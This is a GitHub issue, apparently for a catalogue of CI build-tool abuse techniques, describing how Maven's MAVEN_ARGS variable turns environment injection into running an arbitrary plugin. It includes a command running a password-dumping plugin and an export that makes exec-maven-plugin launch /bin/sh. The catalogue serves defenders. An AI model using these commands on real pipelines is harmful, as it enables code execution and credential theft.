[LOTP] Update Maven #28

tr4l · 2024-04-16T06:57:38Z

Description of the LOTP tool

MAVEN, you got it already.

ENV Configuration

Since version 3.9, MAVEN support MAVEN_ARGS env variable as parameter.
In addition to that, you can run (and download) any (approved) plugin without editing the pom.xml

For instance

mvn ninja.stealing:maven-password:0.0.4:dump

Which mean you can escalate an env injection to plugin injection, then RCE (let see with exec-maven-plugin, as in your example)

export MAVEN_ARGS="org.codehaus.mojo:exec-maven-plugin:3.2.0:exec -Dexec.executable=/bin/sh"
mvn clean

Documentation

https://maven.apache.org/configure.html#maven_opts-environment-variable
https://github.com/tr4l/maven-password
https://www.mojohaus.org/exec-maven-plugin/exec-mojo.html

The text was updated successfully, but these errors were encountered:

tr4l · 2024-04-16T07:04:34Z

Note:
https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml

You can achieve the same on GITLAB with old version of maven by using MAVEN_CLI_OPTS env

tr4l added the idea label Apr 16, 2024

fproulx-boostsecurity added the good first issue Good for newcomers label Nov 19, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[LOTP] Update Maven #28

[LOTP] Update Maven #28

tr4l commented Apr 16, 2024

tr4l commented Apr 16, 2024

[LOTP] Update Maven #28

[LOTP] Update Maven #28

Comments

tr4l commented Apr 16, 2024

Description of the LOTP tool

ENV Configuration

Documentation

tr4l commented Apr 16, 2024